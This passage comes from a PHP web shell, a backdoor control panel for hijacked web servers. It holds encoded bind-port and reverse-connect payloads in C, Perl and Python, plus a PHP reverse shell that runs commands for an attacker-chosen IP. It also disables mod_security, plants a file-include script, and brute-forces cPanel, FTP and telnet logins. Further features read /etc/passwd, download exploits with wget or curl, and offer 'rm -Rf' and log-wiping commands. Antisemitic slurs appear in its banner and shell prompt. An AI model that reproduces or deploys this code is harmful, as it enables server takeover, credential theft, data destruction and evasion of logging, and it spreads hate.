5487 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5488 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5489 ajaxRequest.send(params);
5490}
5491function execode(code)
5492{
5493 var intext = document.getElementById('intext').checked;
5494 var message = encodeURIComponent(message);
5495 var params = "code="+code+"&intext="+intext;
5496 document.getElementById("showresult").innerHTML=waitstate;
5497 var ajaxRequest;
5498 ajaxRequest = new XMLHttpRequest();
5499
5500 ajaxRequest.onreadystatechange = function()
5501 {
5502 if(ajaxRequest.readyState == 4)
5503 {
5504 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
5505 }
5506 }
5507
5508 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5509 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5510 ajaxRequest.send(params);
5511}
5512function malwarefun(malwork)
5513{
5514 var malpath = document.getElementById('createfile').value;
5515 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
5516 var ajaxRequest;
5517 ajaxRequest = new XMLHttpRequest();
5518
5519 ajaxRequest.onreadystatechange = function()
5520 {
5521 if(ajaxRequest.readyState == 4)
5522 {
5523 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
5524 }
5525 }
5526
5527 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
5528 ajaxRequest.send(null);
5529}
5530function getexploit(wurl,path,functiontype)
5531{
5532 document.getElementById("showexp").innerHTML=waitstate;
5533 var ajaxRequest;
5534 ajaxRequest = new XMLHttpRequest();
5535
5536 ajaxRequest.onreadystatechange = function()
5537 {
5538 if(ajaxRequest.readyState == 4)
5539 {
5540 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
5541 }
5542 }
5543
5544 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
5545 ajaxRequest.send(null);
5546}
5547function showMsg(msg)
5548{
5549 if(msg == 'smf')
5550 {
5551 document.getElementById('tableprefix').value="smf_";
5552 document.getElementById('fid').style.display='block';
5553 document.getElementById('wpress').style.display='none';
5554 document.getElementById('joomla').style.display='none';
5555 }
5556 if(msg == 'mybb')
5557 {
5558 document.getElementById('tableprefix').value="mybb_";
5559 document.getElementById('wpress').style.display='none';
5560 document.getElementById('joomla').style.display='none';
5561 document.getElementById('fid').style.display='block';
5562 }
5563 if(msg == 'ipb' || msg == 'vb')
5564 {
5565 document.getElementById('tableprefix').value="";
5566 document.getElementById('wpress').style.display='none';
5567 document.getElementById('joomla').style.display='none';
5568 document.getElementById('fid').style.display='block';
5569 }
5570 if(msg == 'wp')
5571 {
5572 document.getElementById('tableprefix').value="wp_";
5573 document.getElementById('wpress').style.display='block';
5574 document.getElementById('fid').style.display='none';
5575 document.getElementById('joomla').style.display='none';
5576 }
5577 if(msg == 'joomla')
5578 {
5579 document.getElementById('joomla').style.display='block';
5580 document.getElementById('tableprefix').value="jos_";
5581 document.getElementById('wpress').style.display='none';
5582 document.getElementById('fid').style.display='none';
5583
5584
5585 }
5586}
5587function checkforum(msg)
5588{
5589 if(msg == 'smf')
5590 {
5591 document.getElementById('tableprefix').value="smf_";
5592 document.getElementById('smfipb').style.display='block';
5593 document.getElementById('myjoomla').style.display='none';
5594 document.getElementById('wordpres').style.display='none';
5595 }
5596 if(msg == 'phpbb')
5597 {
5598 document.getElementById('tableprefix').value="phpb_";
5599 document.getElementById('myjoomla').style.display='none';
5600 document.getElementById('smfipb').style.display='block';
5601 document.getElementById('wordpres').style.display='none';
5602 }
5603 if(msg == 'mybb')
5604 {
5605 document.getElementById('tableprefix').value="mybb_";
5606 document.getElementById('myjoomla').style.display='none';
5607 document.getElementById('smfipb').style.display='none';
5608 }
5609 if(msg == 'vb')
5610 {
5611 document.getElementById('tableprefix').value="";
5612 document.getElementById('myjoomla').style.display='none';
5613 document.getElementById('smfipb').style.display='none';
5614 }
5615 if(msg == 'ipb')
5616 {
5617 document.getElementById('myjoomla').style.display='none';
5618 document.getElementById('smfipb').style.display='block';
5619 document.getElementById('tableprefix').value="";
5620 document.getElementById('wordpres').style.display='none';
5621
5622 }
5623 if(msg == 'wp')
5624 {
5625 document.getElementById('tableprefix').value="wp_";
5626 document.getElementById('myjoomla').style.display='none';
5627 document.getElementById('smfipb').style.display='block';
5628 document.getElementById('wordpres').style.display='block';
5629 }
5630 if(msg == 'joomla')
5631 {
5632 document.getElementById('myjoomla').style.display='block';
5633 document.getElementById('tableprefix').value="jos_";
5634 document.getElementById('smfipb').style.display='none';
5635
5636 }
5637}
5638</script>
5639<body>
5640<?php
5641
5642$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
5643
5644$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
5645
5646$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
5647
5648$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
5649shellstyle();
5650?>
5651<div align="center">
5652<a href="<?php $_SERVER['PHP_SELF'];?>"><font size="6" color="#FF0000" style="text-decoration:none;" face="Times New Roman, Times, serif">Jew : By Adi </font></a>
5653
5654</div>
5655<hr color="#1B1B1B">
5656
5657<table cellpadding="0" style="width:100%;">
5658 <tr>
5659 <td colspan="2" style="width:75%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
5660 <td style="width:10%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
5661 <td style="width:15%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
5662 </tr>
5663 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
5664 <td style="width:75%;" colspan="2">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
5665 <?php $d0mains = @file("/etc/named.conf");
5666 $users=@file('/etc/passwd');
5667 if($d0mains)
5668 {
5669 $count;
5670 foreach($d0mains as $d0main)
5671 {
5672 if(@ereg("zone",$d0main))
5673 {
5674 preg_match_all('#zone "(.*)"#', $d0main, $domains);
5675 flush();
5676 if(strlen(trim($domains[1][0])) > 2)
5677 {
5678 flush();
5679 $count++;
5680 }
5681 }
5682 }
5683 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
5684 }
5685 else if($users)
5686 {
5687 $file = fopen("/etc/passwd", "r");
5688 while(!feof($file))
5689 {
5690 $s = fgets($file);
5691 $matches = array();
5692 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5693 $matches = str_replace("home/","",$matches[1]);
5694 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5695 continue;
5696 $count++;
5697 }
5698 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
5699 </tr><?php } ?>
5700 <tr>
5701 <td style="width:20%;">Disk Space : <font class="txt"><?php echo HumanReadableFilesize(diskSpace()); ?></font></td>
5702 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
5703
5704 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
5705 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
5706 </tr>
5707
5708 <tr>
5709 <?php if($os == 'Windows'){ ?><td style="width:15%;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
5710 <td style="width:30%;">Current Directory : <span id="crdir"><font color="#009900">
5711 <?php
5712 $d = str_replace("\\",$directorysperator,$dir);
5713 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
5714 $d = str_replace("\\\\","\\",$d);
5715 $dispd = htmlspecialchars($d);
5716 $pd = $e = explode($directorysperator,substr($d,0,-1));
5717 $i = 0;
5718 foreach($pd as $b)
5719 {
5720 $t = '';
5721 $j = 0;
5722 foreach ($e as $r)
5723 {
5724 $t.= $r.$directorysperator;
5725 if ($j == $i) {break;}
5726 $j++;
5727 }
5728$href=addslashes($t);
5729
5730 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
5731 $i++;
5732 }
5733
5734 ?>
5735 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
5736 <td style="width:20%;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
5737 <td>Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
5738 <?php if($os == "Linux") { ?><td><a href="<?php echo $self.'?downloadit'?>"><font color="#FF0000">Download It</font></a><?php } ?></td>
5739 </tr>
5740 </table>
5741
5742<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
5743 $m2 = array('SQL'=>'database','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
5744 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
5745 <tr>";
5746 $menu = '';
5747
5748 foreach($m1 as $k => $v)
5749 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5750 echo $menu;
5751 echo "</tr>
5752</table>
5753<div style=\"float:left;\">
5754 <a href=\"javascript:history.back(1)\"><font class=txt size=3> [Back] </font></a>
5755 <a href=\"javascript:history.go(1)\"><font class=txt size=3> [Forward] </font></a>
5756 <a href=\"\"><font class=txt size=3> [Refresh] </font></a></div>
5757<table style=\"margin-left:270px; border-color:#333333;\" border=2 width=60%; cellpadding=2>
5758 <tr align=center>";
5759 foreach($m2 as $k => $v)
5760 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
5761 echo $menu1;
5762 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
5763 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
5764 </tr>
5765</table>";?>
5766
5767<div id="showmaindata"></div>
5768<?php
5769
5770if(isset($_GET["downloadit"]))
5771{
5772 $FolderToCompress = getcwd();
5773 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
5774
5775 $prd=explode("/","backup.tar");
5776 for($i=0;$i<sizeof($prd);$i++)
5777 {
5778 $nfd=$prd[$i];
5779 }
5780 @ob_clean();
5781 header("Content-type: application/octet-stream");
5782 header("Content-length: ".filesize($nfd));
5783 header("Content-disposition: attachment; filename=\"".$nfd."\";");
5784 readfile($nfd);
5785 exit;
5786}
5787//Turn Safe Mode Off
5788
5789 if(getDisabledFunctions() != "None" || safe() != "OFF")
5790 {
5791 $file_pointer = fopen(".htaccess", "w+");
5792 fwrite($file_pointer, "<IfModule mod_security.c>
5793 SecFilterEngine Off
5794 SecFilterScanPOST Off
5795 </IfModule> \n\r");
5796
5797 $file_pointer = fopen("ini.php", "w+");
5798 fwrite($file_pointer, "<?
5799echo ini_get(\"safe_mode\");
5800echo ini_get(\"open_basedir\");
5801include(\$_GET[\"file\"]);
5802ini_restore(\"safe_mode\");
5803ini_restore(\"open_basedir\");
5804echo ini_get(\"safe_mode\");
5805echo ini_get(\"open_basedir\");
5806include(\$_GET[\"ss\"]);
5807?>");
5808
5809 $file_pointer = fopen("php.ini", "w+");
5810 fwrite($file_pointer, "safe_mode = Off");
5811
5812 fclose($file_pointer);
5813
5814 }
5815
5816 else if(isset($_POST['cpanelattack']))
5817 {
5818 if(!empty($_POST['username']) && !empty($_POST['password']))
5819 {
5820 $userlist=explode("\n",$_POST['username']);
5821 $passlist=explode("\n",$_POST['password']);
5822
5823 if($_POST['cracktype'] == "ftp")
5824 {
5825 foreach ($userlist as $user)
5826 {
5827 $pureuser = trim($user);
5828 foreach ($passlist as $password )
5829 {
5830 $purepass = trim($password);
5831 ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5832 }
5833 }
5834 }
5835 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
5836 {
5837 if($cracktype == "telnet")
5838 $cpanel_port="23";
5839 else
5840 $cpanel_port="2082";
5841 foreach ($userlist as $user)
5842 {
5843 $pureuser = trim($user);
5844
5845 echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
5846 Processing user $pureuser ...</font></b><br><br>";
5847
5848 foreach ($passlist as $password )
5849 {
5850 $purepass = trim($password);
5851 cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
5852
5853 }
5854 }
5855 }
5856 }
5857 else
5858 $bdmessage = "<center>Enter Username & Password List<center>";
5859 }
5860
5861else if(isset($_GET['info']))
5862{
5863 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
5864}
5865else if(isset($_POST['u']))
5866{
5867 $path = $_REQUEST['path'];
5868 if(is_dir($path))
5869 {
5870 $setuploadvalue = 0;
5871 $uploadedFilePath = $_FILES['uploadfile']['name'];
5872 $tempName = $_FILES['uploadfile']['tmp_name'];
5873 if($os == "Windows")
5874 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5875 else if($os == "Linux")
5876 $uploadPath = $path . $directorysperator . $uploadedFilePath;
5877 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
5878 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
5879 else
5880 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
5881 }
5882 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
5883}
5884else if(isset($_POST['backdoor']))
5885{
5886 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
5887 { ?><script type="text/javascript">gethome('connect');</script><?php
5888 $passwd = $_POST['passwd'];
5889
5890 if($_POST['lang'] == 'c')
5891 {
5892 if(is_writable("."))
5893 {
5894 @$fh=fopen(getcwd()."/backp.c",'w');
5895 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5896 @fclose($fh);
5897 execmd("chmod 0755 ".getcwd()."/backp.c");
5898 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
5899 execmd("chmod 0755 ".getcwd()."/backp");
5900 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
5901 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5902 if(eregi("backp".$_POST['port'],$scan))
5903 $bdmessage = "Process found running, backdoor setup successfully.";
5904 else
5905 $bdmessage = "Process not found running, backdoor not setup successfully.";
5906 }
5907 else
5908 {
5909 @$fh=fopen("/tmp/backp.c","w");
5910 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
5911 @fclose($fh);
5912 execmd("chmod 0755 /tmp/backp.c");
5913 execmd("gcc -o /tmp/backp /tmp/backp.c");
5914 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
5915 $scan = exec_all("ps aux | grep backp".$_POST['port']);
5916 if(eregi("backp".$_POST['port'],$scan))
5917 $bdmessage = "Process found running, backdoor setup successfully.";
5918 else
5919 $bdmessage = "Process not found running, backdoor not setup successfully.";
5920 }
5921 }
5922 if($_POST['lang'] == 'perl')
5923 {
5924 if(is_writable("."))
5925 {
5926 @$fh=fopen(getcwd()."/bp.pl",'w');
5927 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5928 @fclose($fh);
5929 execmd("chmod 0755 ".getcwd()."/bp.pl");
5930 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5931
5932 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5933 }
5934 else
5935 {
5936 @$fh=fopen("/tmp/bp.pl","w");
5937 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
5938 @fclose($fh);
5939 execmd("chmod 0755 ".getcwd()."/bp.pl");
5940 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
5941 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
5942 }
5943 }
5944 }
5945}
5946else if(isset($_POST['backconnect']))
5947{
5948 if($_POST['ip'] != "" && $_POST['port'] != "")
5949 { ?><script type="text/javascript">gethome('connect');</script><?php
5950 $host = $_POST['ip'];
5951 $port = $_POST['port'];
5952 if($_POST["lang"] == "perl")
5953 {
5954 if(is_writable("."))
5955 {
5956 @$fh=fopen(getcwd()."/bc.pl",'w');
5957 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5958 @fclose($fh);
5959 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5960 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
5961 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
5962 }
5963 else
5964 {
5965 @$fh=fopen("/tmp/bc.pl","w");
5966 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
5967 @fclose($fh);
5968 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5969 execmd("perl /tmp/bc.pl $host $port &",$disable);
5970 if(!@unlink("/tmp/bc.pl"))
5971 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5972 }
5973 }
5974 else if($_POST["lang"] == "python")
5975 {
5976 if(is_writable("."))
5977 {
5978 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
5979 if($w_file)
5980 {
5981 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5982 @fclose($w_file);
5983 chmod(getcwd().'/bc.py', 0777);
5984 }
5985 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
5986 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
5987
5988 if(!@unlink(getcwd()."/bc.py"))
5989 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
5990 }
5991 else
5992 {
5993 $w_file=@fopen("/tmp/bc.py","w");
5994 if($w_file)
5995 {
5996 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
5997 @fclose($w_file);
5998 chmod('/tmp/bc.py', 0777);
5999 }
6000 execmd("python /tmp/bc.py $host $port &",$disable);
6001 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6002 if(!@unlink("/tmp/bc.py"))
6003 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
6004 }
6005 }
6006 else if($_POST["lang"] == "php")
6007 {
6008 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
6009 $ip = $_POST['ip'];
6010 $port=$_POST['port'];
6011 $sockfd=fsockopen($ip , $port , $errno, $errstr );
6012 if($errno != 0)
6013 {
6014 $bdmessage = "<font color='red'><b>$errno</b> : $errstr</font>";
6015 }
6016 else if (!$sockfd)
6017 {
6018 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
6019 }
6020 else
6021 {
6022 fputs ($sockfd ,"\n=================================================================\nBlame the Jews!\n=================================================================");
6023 $pwd = exec_all("pwd");
6024 $sysinfo = exec_all("uname -a");
6025 $id = exec_all("id");
6026 $len = 1337;
6027 fputs($sockfd ,$sysinfo . "\n" );
6028 fputs($sockfd ,$pwd . "\n" );
6029 fputs($sockfd ,$id ."\n\n" );
6030 fputs($sockfd ,$dateAndTime."\n\n" );
6031 while(!feof($sockfd))
6032 {
6033 $cmdPrompt ="(Jew)[$]> ";
6034 fputs ($sockfd , $cmdPrompt );
6035 $command= fgets($sockfd, $len);
6036 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
6037 }
6038 fclose($sockfd);
6039 }
6040 }
6041 }
6042}
6043else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
6044{
6045 $temp = "";
6046 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
6047 {
6048 $uid = @posix_getpwuid($_GET['val1']);
6049 if ($uid)
6050 $temp .= join(':',$uid)."\n";
6051 }
6052 echo '<br/>';
6053 paramexe('Users', $temp);
6054}
6055else if(isset($_GET['download']))
6056{
6057 download();
6058}
6059else
6060{
6061 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
6062}
6063$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
6064?>
6065</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
6066<table style="width:100%;border-color:#333333;" border="1">
6067<tr>
6068<td align="center">
6069<form method="post" enctype="multipart/form-data">
6070Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
6071<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
6072<input type=submit value="Upload" name="u" value="u" class="but" ></form>
6073<span name="wrtble"><?php
6074echo $is_writable; ?></span>
6075 <br>
6076</td>
6077<td align="center" style="height:105px;">Create File :
6078<form onSubmit="createdir('Create',createfile.value);return false;">
6079<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
6080<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
6081</form><span name="wrtble">
6082<?php echo $is_writable; ?></span>
6083</td>
6084</tr>
6085<tr>
6086<td align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
6087<input type="text" class="box" name="execute">
6088<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
6089 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
6090
6091<td align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
6092<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
6093<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
6094</form><span name="wrtble"><?php
6095echo $is_writable;
6096?></span></td></tr>
6097<tr><td style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
6098<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
6099<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
6100<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
6101<select name="functiontype" class="sbox">
6102<option value="wwget">wget</option>
6103<option value="wlynx">lynx</option>
6104<option value="wfread">fread</option>
6105<option value="wfetch">fetch</option>
6106<option value="wlinks">links</option>
6107<option value="wget">GET</option>
6108<option value="wcurl">curl</option>
6109</select>
6110</form><div id="showexp"></div>
6111</td>
6112<td align="center">
6113<form>
6114Some Commands<br>
6115<?php if($os != "Windows")
6116{ ?>
6117<SELECT NAME="mycmd" class="box">
6118 <OPTION VALUE="uname -a">Kernel version
6119 <OPTION VALUE="w">Logged in users
6120 <OPTION VALUE="lastlog">Last to connect
6121 <option value='cat /etc/hosts'>IP Addresses
6122 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
6123 <OPTION VALUE="logeraser">Log Eraser
6124 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
6125 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
6126 <OPTION VALUE="find / -type f -name \"config*\"">find config* files
6127 <OPTION VALUE="find . -type f -name \"config*\"">find config* files in current dir
6128 <OPTION VALUE="find . -type f -perm -04000 -ls">find suid files in current dir
6129 <OPTION VALUE="find / -type f -perm -04000 -ls">find all suid files
6130 <OPTION VALUE="find / -user root -perm -022">find all sgid files
6131 <OPTION VALUE="find . -type f -perm -02000 -ls">find suid files in current dir
6132 <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
6133 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
6134 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
6135 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
6136 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
6137 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
6138 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
6139 <OPTION VALUE="ps aux">Show running proccess
6140 <OPTION VALUE="uptime">Uptime check
6141 <OPTION VALUE="cat /proc/meminfo">Memory check
6142 <OPTION VALUE="netstat -an | grep -i listen">Open ports
6143 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
6144 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
6145 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
6146 <OPTION VALUE="./zap2">WIPELOGS PT3
